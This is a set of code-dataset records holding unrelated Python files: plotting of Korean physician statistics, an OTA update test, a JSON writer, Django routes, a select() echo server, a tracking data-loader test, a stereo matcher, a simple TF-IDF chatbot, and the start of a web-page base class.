'Year', 'Value']\n OECDPer1000Mean = OECDPer1000.groupby(['Division','Year']).mean()\n OECDPer1000Mean = OECDPer1000Mean.iloc[0:60,:]\n OECDPer1000Mean = OECDPer1000Mean.reset_index()\n year=list(OECDPer1000Mean['Year'])\n OECDValue = 
list(OECDPer1000Mean['Value'])\n mask = (OECDPer1000.Year > 2019) & (OECDPer1000.Division == '1000명당 의사수')\n OECDPer1000Regression = OECDPer1000.loc[mask, :]\n OECDPer1000Regression = OECDPer1000Regression[['Division','Year','Value']]\n OECDPer1000RegressionYear = list(OECDPer1000Regression['Year'])\n OECDPer1000RegressionValue = list(OECDPer1000Regression['Value'])\n year = year+OECDPer1000RegressionYear\n OECDValue = np.around(np.array(OECDValue+OECDPer1000RegressionValue),2)\n\n return OECDValue\n\n\n# 1000명당 국내 의사수 그래프\ndef makeFigureDocPer1000(dfThousandPerDoctor):\n fig = go.Figure()\n\n docPer1000 = thousandDocGet(dfThousandPerDoctor)\n docPerThousend = list(docPer1000['docnum']) # 1000명당 국내 의사 수 \n OECDPerData = OECDDocGet()\n\n fig.add_trace(go.Scatter(x=np.array(range(1950,2048)), y=docPerThousend,\n mode='lines',\n name='대한민국'))\n fig.add_trace(go.Scatter(x=np.array(range(1960,2048)), y=OECDPerData,\n mode='lines',\n name='OECD평균'))\n\n fig.update_layout(margin=dict(l=0,r=0,t=1,b=0), \n showlegend=True,\n legend=dict(\n yanchor=\"top\",\n y=0.99,\n xanchor=\"left\",\n x=0.01\n ))\n\n fig.update_yaxes(title_text=\"인구 1000명당 의사수\")\n fig.update_xaxes(title_text=\"연도\") \n\n return fig\n\n# 의사 1명당 연간 외래진료수 그래프\ndef makeFigureVisitDoctor(npVisitData):\n npVisitData = np.around(npVisitData,2)\n fig = go.Figure()\n\n fig.add_trace(go.Scatter(x=np.array(range(2010,2048)), y=npVisitData[0],\n mode='lines',\n name='대한민국'))\n fig.add_trace(go.Scatter(x=np.array(range(2010,2048)), y=npVisitData[1],\n mode='lines',\n name='OECD평균'))\n\n fig.update_layout(margin=dict(l=0,r=0,t=1,b=0), \n showlegend=True,\n legend=dict(\n yanchor=\"top\",\n y=0.99,\n xanchor=\"left\",\n x=0.01\n ))\n\n fig.update_yaxes(title_text=\"의사 1명당 연간 외래진료 수\")\n fig.update_xaxes(title_text=\"연도\") \n\n return fig\n\n# 연간 전체 의사수\ndef makeFigureSumDoc(dfResultPerson,dfPopulation,npRealDoctor, npRealWorkDoctor):\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n \n year = list(range(1950, 2048))\n docData =getDataframe(dfResultPerson)\n manSumDoc = list(docData[0].sum(axis=1))\n womSumDoc = list(docData[1].sum(axis=1))\n bothSumDoc = list(docData[2].sum(axis=1))\n popDoc = list(np.array(dfPopulation.T)[0])\n \n fig.add_trace(go.Scatter(x=year, y=manSumDoc,\n mode='lines',\n name='A-추정 남성 활동 의사수'), secondary_y=False)\n fig.add_trace(go.Scatter(x=year, y=womSumDoc,\n mode='lines',\n name='A-추정 여성 활동 의사수'), secondary_y=False)\n fig.add_trace(go.Scatter(x=year, y=bothSumDoc,\n mode='lines',\n name='A-추청 전체 활동 의사수'), secondary_y=False)\n\n fig.add_trace(go.Scatter(x=list(range(2003, 2021)), y=npRealWorkDoctor[53:71],\n mode='lines', visible='legendonly',\n name='A-실제 활동 의사수'), secondary_y=False) \n\n fig.add_trace(go.Scatter(x=list(range(1955, 2018)), y=npRealDoctor[1][5:79],\n mode='lines', visible='legendonly',\n name='A-실제 남성 신고 의사수'), secondary_y=False)\n fig.add_trace(go.Scatter(x=list(range(1955, 2018)), y=npRealDoctor[2][5:79],\n mode='lines', visible='legendonly',\n name='A-실제 여성 신고 의사수'), secondary_y=False)\n fig.add_trace(go.Scatter(x=list(range(1955, 2018)), y=npRealDoctor[0][5:79],\n mode='lines', visible='legendonly',\n name='A-실제 전체 신고 의사수'), secondary_y=False) \n\n fig.add_trace(go.Scatter(x=list(range(1950, 2047)), y=popDoc,\n mode='lines',\n name='B-인구수'), secondary_y=True)\n fig.update_layout(margin=dict(l=0,r=0,t=1,b=0), \n showlegend=True,\n legend=dict(\n yanchor=\"top\",\n y=0.99,\n xanchor=\"left\",\n x=0.01\n ))\n\n # Set y-axes titles\n fig.update_yaxes(title_text=\"A-의사수\", 
secondary_y=False)\n fig.update_yaxes(title_text=\"B-인구수\", secondary_y=True)\n fig.update_xaxes(title_text=\"연도\") \n return fig\n\n# 연간 은퇴 의사수\ndef getDataframe2(dfRetirePerson):\n #남성 의사 인력 DataFrame, 변수명 manDoc\n manDoc = dfRetirePerson[0]\n index = list(range(1950,2048))\n manDoc = manDoc.set_index([index])\n\n #여성 의사 인력 DataFrame, 변수명 womDoc\n womDoc = dfRetirePerson[1]\n index = list(range(1950,2048))\n womDoc = womDoc.set_index([index])\n\n bothdoc = dfRetirePerson[2]\n index = list(range(1950,2048))\n bothdoc = bothdoc.set_index([index])\n return [manDoc, womDoc, bothdoc]\n\ndef makeFigureRetireDoc(dfRetirePerson):\n fig = go.Figure()\n \n year = list(range(1950, 2048))\n docData =getDataframe2(dfRetirePerson)\n manSumDoc = list(docData[0].sum(axis=1))\n womSumDoc = list(docData[1].sum(axis=1))\n bothSumDoc = list(docData[2].sum(axis=1))\n \n fig.add_trace(go.Scatter(x=year, y=manSumDoc,\n mode='lines',\n name='남성'))\n fig.add_trace(go.Scatter(x=year, y=womSumDoc,\n mode='lines',\n name='여성'))\n fig.add_trace(go.Scatter(x=year, y=bothSumDoc,\n mode='lines',\n name='전체'))\n fig.update_layout(margin=dict(l=0,r=0,t=1,b=0), \n showlegend=True,\n legend=dict(\n yanchor=\"top\",\n y=0.99,\n xanchor=\"left\",\n x=0.01\n ))\n\n fig.update_yaxes(title_text=\"은퇴 의사수\")\n fig.update_xaxes(title_text=\"연도\") \n return fig\n\n# 연간 사망 의사수\ndef getDataframe3(dfDeadPerson):\n #남성 의사 인력 DataFrame, 변수명 manDoc\n manDoc = dfDeadPerson[0]\n index = list(range(1950,2048))\n manDoc = manDoc.set_index([index])\n \n #여성 의사 인력 DataFrame, 변수명 womDoc\n womDoc = dfDeadPerson[1]\n index = list(range(1950,2048))\n womDoc = womDoc.set_index([index])\n \n bothdoc = dfDeadPerson[2]\n index = list(range(1950,2048))\n bothdoc = bothdoc.set_index([index])\n return [manDoc, womDoc, bothdoc]\n\ndef makeFigureDeadDoc(dfDeadPerson):\n fig = go.Figure()\n \n year = list(range(1950, 2048))\n docData =getDataframe3(dfDeadPerson)\n manSumDoc = list(docData[0].sum(axis=1))\n womSumDoc = list(docData[1].sum(axis=1))\n bothSumDoc = list(docData[2].sum(axis=1))\n \n fig.add_trace(go.Scatter(x=year, y=manSumDoc,\n mode='lines',\n name='남성'))\n fig.add_trace(go.Scatter(x=year, y=womSumDoc,\n mode='lines',\n name='여성'))\n fig.add_trace(go.Scatter(x=year, y=bothSumDoc,\n mode='lines',\n name='전체'))\n fig.update_layout(margin=dict(l=0,r=0,t=1,b=0), \n showlegend=True,\n legend=dict(\n yanchor=\"top\",\n y=0.99,\n xanchor=\"left\",\n x=0.01\n )) \n\n fig.update_yaxes(title_text=\"사망 의사수\")\n fig.update_xaxes(title_text=\"연도\") \n return fig\n\n# 연간 신규 의사수\ndef getDataframe4(dfNewPerson):\n #남성 의사 인력 DataFrame, 변수명 manDoc\n manDoc = dfNewPerson[0]\n index = list(range(1950,2048))\n manDoc = manDoc.set_index([index])\n \n #여성 의사 인력 DataFrame, 변수명 womDoc\n womDoc = dfNewPerson[1]\n index = list(range(1950,2048))\n womDoc = womDoc.set_index([index])\n \n bothdoc = dfNewPerson[2]\n index = list(range(1950,2048))\n bothdoc = bothdoc.set_index([index])\n return [manDoc, womDoc, bothdoc]\n\ndef makeFigureNewDoc(dfNewPerson):\n fig = go.Figure()\n \n year = list(range(1950, 2048))\n docData =getDataframe4(dfNewPerson)\n manSumDoc = list(docData[0].sum(axis=1))\n womSumDoc = list(docData[1].sum(axis=1))\n bothSumDoc = list(docData[2].sum(axis=1))\n \n fig.add_trace(go.Scatter(x=year, y=manSumDoc,\n mode='lines',\n name='남성'))\n fig.add_trace(go.Scatter(x=year, y=womSumDoc,\n mode='lines',\n name='여성'))\n fig.add_trace(go.Scatter(x=year, y=bothSumDoc,\n mode='lines',\n name='전체'))\n fig.update_layout(margin=dict(l=0,r=0,t=1,b=0), \n 
showlegend=True,\n legend=dict(\n yanchor=\"top\",\n y=0.99,\n xanchor=\"left\",\n x=0.01\n ))\n\n fig.update_yaxes(title_text=\"신규 의사수\")\n fig.update_xaxes(title_text=\"연도\") \n return fig","sub_path":"graphpkg/doctorGraph.py","file_name":"doctorGraph.py","file_ext":"py","file_size_in_byte":16521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"176425592","text":"#!/usr/bin/python\n# Copyright 2017 Northern.tech AS\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom fabric.api import *\nimport pytest\nimport time\nfrom ..common import *\nfrom ..common_setup import *\nfrom ..helpers import Helpers\nfrom ..MenderAPI import auth_v2, deploy, image, logger\nfrom .common_update import common_update_procedure\nfrom .mendertesting import MenderTesting\n\n@pytest.mark.usefixtures(\"standard_setup_one_client_bootstrapped\")\nclass TestFailures(MenderTesting):\n\n @MenderTesting.slow\n def test_update_image_id_already_installed(self, install_image=conftest.get_valid_image()):\n \"\"\"Uploading an image with an incorrect name set results in failure and rollback.\"\"\"\n\n if not env.host_string:\n execute(self.test_update_image_id_already_installed,\n hosts=get_mender_clients(),\n install_image=install_image)\n return\n\n with Helpers.RebootDetector() as reboot:\n deployment_id, expected_image_id = common_update_procedure(install_image, True)\n reboot.verify_reboot_performed()\n\n devices_accepted_id = [device[\"id\"] for device in auth_v2.get_devices_status(\"accepted\")]\n deployment_id = deploy.trigger_deployment(name=\"New valid update\",\n artifact_name=expected_image_id,\n devices=devices_accepted_id)\n\n deploy.check_expected_statistics(deployment_id, \"already-installed\", len(get_mender_clients()))\n deploy.check_expected_status(\"finished\", deployment_id)\n\n @MenderTesting.fast\n def test_large_update_image(self):\n \"\"\"Installing an image larger than the passive/active parition size should result in a failure.\"\"\"\n if not env.host_string:\n execute(self.test_large_update_image, hosts=get_mender_clients())\n return\n\n with Helpers.RebootDetector() as reboot:\n deployment_id, _ = common_update_procedure(install_image=\"large_image.dat\")\n deploy.check_expected_statistics(deployment_id, \"failure\", len(get_mender_clients()))\n reboot.verify_reboot_not_performed()\n deploy.check_expected_status(\"finished\", deployment_id)\n","sub_path":"tests/tests/test_image_update_failures.py","file_name":"test_image_update_failures.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"12887354","text":"from utils.ExceptionHandling import WRITER_ALREADY_EXISTS\nfrom utils.ReaderWriterConstants import \\\n PATH_TO_FILE, WRITE_MODE, END_ARRAY, \\\n BEGIN_ARRAY, COMMA, END_LINE, READER_CONSTANT\nfrom utils.TrialConstants import TRIAL, \\\n LIGHT_TRIAL, STRONG_TRIAL, EXTRA_TRIAL, camel_to_snake\nfrom 
trialsfactory.writerserializers.ExtraTrialJsonSerializer \\\n    import ExtraTrialJsonSerializer\nfrom trialsfactory.writerserializers.TrialJsonSerializer \\\n    import TrialJsonSerializer\nimport os\n\n\nclass JsonTrialWriter:\n    __TRIAL_JSON_SERIALIZERS_DICT = {TRIAL: TrialJsonSerializer(),\n                                     LIGHT_TRIAL: TrialJsonSerializer(),\n                                     STRONG_TRIAL: TrialJsonSerializer(),\n                                     EXTRA_TRIAL: ExtraTrialJsonSerializer()}\n\n    def __init__(self, *args):\n        writer = args[READER_CONSTANT]\n        if os.path.isfile(PATH_TO_FILE + writer):\n            raise ValueError(WRITER_ALREADY_EXISTS + writer)\n        self.writer = open(PATH_TO_FILE + writer, mode=WRITE_MODE)\n        self.writer.write(BEGIN_ARRAY)\n        self.first = True\n\n    def __enter__(self):\n        return self\n\n    def write_trial(self, trial):\n        json_trial = JsonTrialWriter.__TRIAL_JSON_SERIALIZERS_DICT \\\n            .get(camel_to_snake(trial.__class__.__name__)) \\\n            .serialize(trial)\n        if self.first:\n            self.writer.write(json_trial)\n            self.first = False\n        else:\n            self.writer.write(\n                COMMA + END_LINE + json_trial)\n\n    def __exit__(self, exc_type, exc_val, exc_tb):\n        self.writer.write(END_ARRAY)\n        self.writer.close()\n","sub_path":"threads2/writers/JsonTrialWriter.py","file_name":"JsonTrialWriter.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"361747681","text":"from django.urls import path\nfrom . import views\n\n\napp_name = 'community'\nurlpatterns = [\n    path('', views.index, name='index'),\n    path('detail//', views.detail, name='detail'),\n    path('new//', views.new, name='new'),\n    path('finish/', views.finish, name='finish'),\n    path('error/', views.error, name='error'),\n]","sub_path":"SServer/Server/community/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"196846507","text":"import sys\nfor s in sys.stdin:\n    try:\n        n = int(s)\n        d = 3\n        a1 = 2\n        an = a1 + (n-1)*d\n        sums = (a1 + an)/2 * n\n        print(int(sums))\n    except:\n        print(-1)","sub_path":"4.面试/1.华为机试/HJ100.等差数列.py","file_name":"HJ100.等差数列.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"168066923","text":"# coding: utf-8 \n\n\"\"\"\nServer\nExplain how to use select\n\"\"\"\nimport select\nimport socket\nimport Queue\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\nserver = socket.socket()\nserver.setblocking(False)\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserver.bind(('localhost', 6000))\nserver.listen(10)\n\n\nins = [server]\nouts = []\nexcps = []\ntimeout = 10\n\nmsg = {}\n\nwhile 1:\n\tr, w, e = select.select(ins, outs, excps, timeout)\n\tfor s in r:\n\t\tif s is server:\n\t\t\tconn, cli_addr = s.accept()\n\t\t\tconn.setblocking(False)\n\t\t\tins.append(conn)\n\t\t\tmsg[conn] = Queue.Queue()\n\t\telse:\n\t\t\tdata = s.recv(1024)\n\t\t\tif data:\n\t\t\t\tmsg[s].put(data)\n\t\t\t\tif s not in outs:\n\t\t\t\t\touts.append(s)\n\t\t\telse:\n\t\t\t\tins.remove(s)\n\t\t\t\tif s in outs:\n\t\t\t\t\touts.remove(s)\n\t\t\t\ts.close()\n\t\t\t\tdel msg[s]\n\tfor s in w:\n\t\ttry:\n\t\t\tdata = msg[s].get_nowait()\n\t\texcept Queue.Empty:\n\t\t\touts.remove(s)\n\t\telse:\n\t\t\ts.send(data)\n\tfor s in e:\n\t\ts.close()\n\t\tif s in ins:\n\t\t\tins.remove(s)\n\t\tif s in outs:\n\t\t\touts.remove(s)\n\t\tdel 
msg[s]\n\n","sub_path":"python/io_multiplexing/select_demo.py","file_name":"select_demo.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"506833383","text":"# ------------------------------------------------------------------------------\n# Copyright (c) Microsoft\n# Licensed under the MIT License.\n# Written by Houwen Peng and Zhipeng Zhang\n# Email: houwen.peng@microsoft.com\n# Details: SiamFC training script\n# ------------------------------------------------------------------------------\n\nimport _init_paths\nimport argparse\nimport pprint\n\nfrom torch.utils.data import DataLoader\n\nfrom core.config import config, update_config\nfrom dataset.siamfc import SiamFCDataset\nfrom utils.utils import create_logger\n\neps = 1e-5\ndef parse_args():\n \"\"\"\n args for training.\n \"\"\"\n parser = argparse.ArgumentParser(description='Train SiamFC')\n # general\n parser.add_argument('--cfg', required=True, type=str, default='/home/syh/siamdw/experiments/train/SiamFC.yaml', help='yaml configure file name')\n\n args, rest = parser.parse_known_args()\n # update config\n update_config(args.cfg)\n\n parser.add_argument('--gpus', type=str, help='gpus')\n parser.add_argument('--workers', type=int, help='num of dataloader workers')\n\n args = parser.parse_args()\n\n return args\n\n\ndef reset_config(config, args):\n \"\"\"\n set gpus and workers\n \"\"\"\n if args.gpus:\n config.GPUS = args.gpus\n if args.workers:\n config.WORKERS = args.workers\n\ndef main():\n # [*] args, loggers and tensorboard\n args = parse_args()\n reset_config(config, args)\n\n logger, _, tb_log_dir = create_logger(config, 'SIAMFC', 'train')\n logger.info(pprint.pformat(args))\n logger.info(pprint.pformat(config))\n\n # parallel\n gpus = [int(i) for i in config.GPUS.split(',')]\n gpu_num = len(gpus)\n logger.info('GPU NUM: {:2d}'.format(len(gpus)))\n logger.info('model prepare done')\n\n # build dataloader, benefit to tracking\n train_set = SiamFCDataset(config)\n train_loader = DataLoader(train_set, batch_size=config.SIAMFC.TRAIN.BATCH * gpu_num, num_workers=config.WORKERS,pin_memory=True, sampler=None)\n\n nCount=0\n for iter, input in enumerate(train_loader):\n # measure data loading time\n\n # input and output/loss\n label_cls = input[2]\n template = input[0]\n search = input[1]\n nCount=nCount+1\n\n if nCount==5:\n break\n\n print('=====')\n\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n","sub_path":"siamese_tracking/data_gen_test.py","file_name":"data_gen_test.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"74982510","text":"from components.interfaces.SequentialMatcher import SequentialMatcher\n\n# python packages\nimport numpy as np\nimport traceback\n\n#print(\"Number of processors: \", mp.cpu_count())\n\nclass Wrapper(SequentialMatcher):\n\n def __init__(self, match, gap, egap, first_rows_fill_func = None, dmax=64):\n self.match = match\n self.gap = gap\n self.egap = egap\n self.matrices = None\n self.dmax = dmax\n if(first_rows_fill_func is None):\n self._first_rows_fill_func=self.fillUpFirstRows\n else:\n self._first_rows_fill_func =first_rows_fill_func\n def initialize(self, to, what):\n message = \"Matcher is being initalized\"\n #is it necessary at all?\n\n self.im1=to\n self.im2 = what\n self.rows = int(to.shape[0])\n self.columns = int(to.shape[1])\n\n self.initializeMatrices(to, what)\n\n message = \"Matcher 
has been initialized.\"\n print(message)\n\n def initializeMatrices(self, img1, img2):\n assert (img1.shape == img2.shape), \"The passed images don't have the same dimensions.\"\n\n self.initializeMatrixTemplate(img1[0], img2[0])\n self.matrices = []\n for row in range(self.rows):\n self.matrices.append(self.rowMatrixTemplate.copy())\n print(len(self.matrices))\n\n\n def initializeMatrixTemplate(self, s1, s2):\n\n self.rowMatrixTemplate = {}\n self.rowMatrixTemplate[\"scores\"] = np.zeros([len(s1) + 1, len(s2) + 1])\n #self.rowMatrixTemplate[\"scores\"] .fill(np.finfo(\"d\").min)\n self.rowMatrixTemplate[\"moves\"] = np.zeros([len(s1) + 1, len(s2) + 1])\n #as it is going horizontally: 2=left\n self.maclean_moves(self.rowMatrixTemplate[\"moves\"])\n self._first_rows_fill_func(self, self.rowMatrixTemplate[\"scores\"])\n #self._first_rows_fill_func(self, self.rowMatrixTemplate[\"scores\"].T)\n\n self.rowMatrixTemplate[\"tracebackPath\"] = None\n self.rowMatrixTemplate[\"tracebackIndices\"] = {0: [-1, 0], 1: [-1, -1], 2: [0, -1]}\n self.rowMatrixTemplate[\"tracebackMapping\"] = {0: \"top\", 1: \"diag\", 2: \"left\"}\n\n\n\n def alignImagesBody(self, i):\n mmmatches = 0\n currentMatrices = self.matrices[i]\n\n for index1 in range(1, int(self.columns+1)):\n\n starting_index = 1 if index1 <= self.dmax + 1 else index1 - self.dmax\n\n for index2 in range(starting_index, index1+1):\n #if(not index1-index2>=0):\n # break\n #if(not index1-index2self.dmax):\n # break\n mismatch = int(-np.abs(int(self.im1[i, int(index1-1)]) - int(self.im2[i, int(index2-1)])))\n diagScoreBase = currentMatrices[\"scores\"][int(index1 - 1), int(index2 - 1)]\n diagScore = diagScoreBase + self.match + mismatch\n\n northMove = currentMatrices[\"moves\"][int(index1-1), index2]\n northScoreAdd = self.egap if northMove == 0 else self.gap\n northScore = currentMatrices[\"scores\"][int(index1-1), index2] + northScoreAdd\n\n # westScore\n westMove = currentMatrices[\"moves\"][index1, int(index2-1)]\n westScoreAdd = self.egap if westMove == 2 else self.gap\n westScore = currentMatrices[\"scores\"][index1, int(index2-1)] +westScoreAdd\n\n results = np.array([northScore, diagScore, westScore])\n\n max_element_index = np.argmax(results)\n\n\n max_element_value = results[max_element_index]\n\n currentMatrices[\"scores\"][index1, index2] = max_element_value\n currentMatrices[\"moves\"][index1, index2] = max_element_index\n self.getTracebackPath(i)\n return {i: self.matrices[i]}\n\n def fillUpFirstRows(self, matrix):\n for i in range(len(matrix[0])):\n if (i == 1):\n matrix[0, i] = self.gap\n if(i>1):\n matrix[0, i] = self.gap+self.egap*(i-1)\n\n def fillUpFirstRows2(self, matrix):\n for i in range(len(matrix[0])):\n matrix[0, i] = self.gap * (i)\n\n def fillUpFirstRows3(self, matrix):\n for i in range(len(matrix[0])):\n matrix[0, i] = self.gap*self.columns\n\n def maclean_init(self, matrix):\n for i in range(0, matrix.shape[0]):\n matrix[i:, i] = np.array([(i) * self.gap for i in range(i, matrix.shape[0])]).T\n matrix[i, i:] = np.array([(i) * self.gap for i in range(i, matrix.shape[1])])\n\n def maclean_moves(self, matrix):\n for i in range(0, matrix.shape[0]):\n matrix[i:, i] = 0\n matrix[i, i:] = 2\n def alignImages(self):\n for i in range(0, self.rows):\n self.alignImagesBody(i)\n self.generateDisparity()\n\n def getTracebackStart(self, currentIndex):\n\n yMaxIndex = np.argmax(self.matrices[currentIndex][\"scores\"][:, self.columns])\n xMaxIndex = np.argmax(self.matrices[currentIndex][\"scores\"][self.columns, :])\n\n yMaxValue = 
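alignImagesBody above fills a banded dynamic-programming table in which every cell takes the best of a diagonal match move and two gap moves, with a cheaper cost (egap) for extending an existing gap. A minimal unbanded sketch of that recurrence for two short intensity rows, simplified (as an assumption, not the Wrapper API) to a single linear gap penalty:

import numpy as np

def align_score(s1, s2, match=20, gap=-10):
    n, m = len(s1), len(s2)
    score = np.zeros((n + 1, m + 1))
    score[0, :] = gap * np.arange(m + 1)          # first row: all gaps
    score[:, 0] = gap * np.arange(n + 1)          # first column: all gaps
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            diag = score[i - 1, j - 1] + match - abs(int(s1[i - 1]) - int(s2[j - 1]))
            score[i, j] = max(diag, score[i - 1, j] + gap, score[i, j - 1] + gap)
    return score[n, m]

print(align_score([10, 20, 30], [12, 21, 29]))    # higher = better alignment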
self.matrices[currentIndex][\"scores\"][yMaxIndex, self.columns]\n xMaxValue = self.matrices[currentIndex][\"scores\"][self.columns, xMaxIndex]\n\n return (yMaxIndex, self.columns) if (yMaxValue > xMaxValue) else (self.columns, xMaxIndex)\n\n def getTracebackPath(self, currentIndex):\n curY, curX = self.getTracebackStart(currentIndex)\n\n moves = list()\n while (curY != 0 and curX != 0):\n previousMove = int(self.matrices[currentIndex][\"moves\"][curY, curX])\n try:\n nexCoordinates = self.matrices[currentIndex][\"tracebackIndices\"][previousMove]\n except:\n print(\"There has been an error with the following previous move:\")\n print(previousMove)\n\n curY += nexCoordinates[0]\n curX += nexCoordinates[1]\n # message = \"Traceback starging indices: %d %d\"%(curX, curY)\n # warnings.warn(message)\n moves.append(self.matrices[currentIndex][\"tracebackMapping\"][previousMove])\n\n self.matrices[currentIndex][\"tracebackPath\"] = list(reversed(moves))\n\n def generateDisparity(self):\n try:\n scanlines = np.zeros(self.im1.shape)\n\n for index in range(len(self.matrices)):\n scanline = np.zeros(self.columns)\n\n lefts = 0\n tops = 0\n currentPixel = 0\n\n for direction in self.matrices[index][\"tracebackPath\"]:\n if (direction == \"left\"):\n lefts += 1\n elif (direction == \"top\"):\n tops += 1\n scanline[currentPixel] = 0\n currentPixel += 1\n elif (direction == \"diag\"):\n scanline[currentPixel] = np.abs(lefts - tops) # + self.im1[index, int(currentPixel)]\n currentPixel += 1\n else:\n print(\"Something is not right here!\")\n raise Exception\n scanlines[index] = scanline\n\n self.lastDisparity = np.asarray(scanlines)\n except(Exception):\n print(\"Unexpected error.\")\n traceback.print_exc()\n\n\n\n","sub_path":"components/matchers/OriginalMatcher3.py","file_name":"OriginalMatcher3.py","file_ext":"py","file_size_in_byte":7340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"111008555","text":"from chatbot import *\nfrom newspaper import Article\nimport random\nimport string\nimport numpy as np\nimport warnings\nimport nltk\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nwarnings.filterwarnings('ignore')\n\nnltk.download('punkt',quiet=True)\nnltk.download('wordnet',quiet=True)\n\narticle = Article('https://www.pharmaceutical-journal.com/news-and-analysis/features/everything-you-should-know-about-the-coronavirus-outbreak/20207629.article?firstPass=false')\narticle.download()\narticle.parse()\narticle.nlp()\ncorpus = article.text\n#dividing the senteses \ntext = corpus\nsent_tokens = nltk.sent_tokenize(text)\n#creating a dictionary to remove the punction\nremove_punct_dict = dict((ord(punct), None) for punct in string.punctuation)\n\n#a function that returns lower case words\ndef LemNormalize(text):\n return nltk.word_tokenize(text.lower().translate(remove_punct_dict))\n\ndef responce(user_responce):\n user_responce = text.lower()\n robo_responce = ''\n sent_tokens.append(user_responce)\n tfidfvec = TfidfVectorizer(tokenizer=LemNormalize, stop_words = 'english')\n tfidf = tfidfvec.fit_transform(sent_tokens)\n val = cosine_similarity(tfidf[-1], tfidf)\n idx = val.argsort()[0][-2]\n flat = val.flatten()\n flat = val.sort()\n score = flat[-2]\n if score == 0:\n robo_responce = responce + \"sory, idont understand\"\n speak(robo_responce)\n else:\n robo_responce = robo_responce + sent_tokens[idx]\n speak(robo_responce)\n sent_tokens.remove(text)\n return 
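generateDisparity above turns a traceback path into a disparity scanline by counting horizontal versus vertical moves and emitting |lefts - tops| at each diagonal step. The same logic in isolation, with a made-up path for illustration:

import numpy as np

def path_to_disparity(path, width):
    scanline = np.zeros(width)
    lefts = tops = pixel = 0
    for move in path:
        if move == "left":
            lefts += 1
        elif move == "top":
            tops += 1
            scanline[pixel] = 0       # occluded pixel, no disparity
            pixel += 1
        elif move == "diag":
            scanline[pixel] = abs(lefts - tops)
            pixel += 1
    return scanline

print(path_to_disparity(["left", "diag", "diag", "top", "diag"], 4))  # [1. 1. 0. 0.]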
robo_responce\n\n# greetings_input = [\"hi\", \"hello\", \"hey\", \"hola\"]\n# greetings_responce = [\"hey\", \"hey there\", \"hi\", \"hello\"]\n# def greeting(sentese):\n# for word in sentese.split():\n# return random.choice(greetings_responce)\n\n\n\n \n\n\n\n","sub_path":"bot/Articles.py","file_name":"Articles.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"609252288","text":"#!/usr/bin/env python\n# -*- mode: python; indent-tabs-mode: nil; -*- coding: utf-8 -*-\n\n\"\"\"\nPage.py\n\nCopyright 2009-2010 by Marcello Perathoner\n\nDistributable under the GNU General Public License Version 3 or newer.\n\nBase class for all pages.\n\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport logging\n\nimport cherrypy\n\nfrom libgutenberg.MediaTypes import mediatypes as mt\nfrom libgutenberg.GutenbergDatabase import DatabaseError\n\nimport BaseSearcher\nimport Formatters\n\nclass Page (object):\n \"\"\" Base for all pages. \"\"\"\n\n def __init__ (self):\n self.supported_book_mediatypes = [ mt.epub, mt.mobi ]\n\n\n @staticmethod\n def format (os):\n \"\"\" Output page. \"\"\"\n return Formatters.formatters[os.format].format (os.template, os)\n\n\n def client_book_mediatypes (self):\n \"\"\" Return the book mediatypes accepted by the client. \"\"\"\n client_accepted_book_mediatypes = []\n\n accept_header = cherrypy.request.headers.get ('Accept')\n\n if accept_header is None:\n client_accepted_book_mediatypes = self.supported_book_mediatypes\n else:\n #cherrypy.log (\"Accept: %s\" % accept_header,\n # context = 'REQUEST', severity = logging.DEBUG)\n\n client_accepted_book_mediatypes = []\n accepts = cherrypy.request.headers.elements ('Accept')\n for accept in accepts:\n if accept.value in self.supported_book_mediatypes:\n if accept.qvalue > 0:\n client_accepted_book_mediatypes.append (accept.value)\n\n return client_accepted_book_mediatypes\n\n\nclass NullPage (Page):\n \"\"\" An empty page. \"\"\"\n\n def index (self, **dummy_kwargs):\n \"\"\" Output an empty page. \"\"\"\n return ''\n\n\nclass SearchPage (Page):\n \"\"\" Abstract base class for all search page classes. \"\"\"\n\n def setup (self, dummy_os, dummy_sql):\n \"\"\" Let derived classes setup the query. \"\"\"\n raise NotImplementedError\n\n def fixup (self, os):\n \"\"\" Give derived classes a chance to further manipulate database results. \"\"\"\n pass\n\n def finalize (self, os):\n \"\"\" Give derived classes a chance to fix default finalization. \"\"\"\n pass\n\n def nothing_found (self, os):\n \"\"\" Give derived class a chance to react if no records were found. \"\"\"\n os.entries.insert (0, self.no_records_found (os))\n\n\n def output_suggestions (self, os, max_suggestions_per_word = 3):\n \"\"\" Make suggestions. 
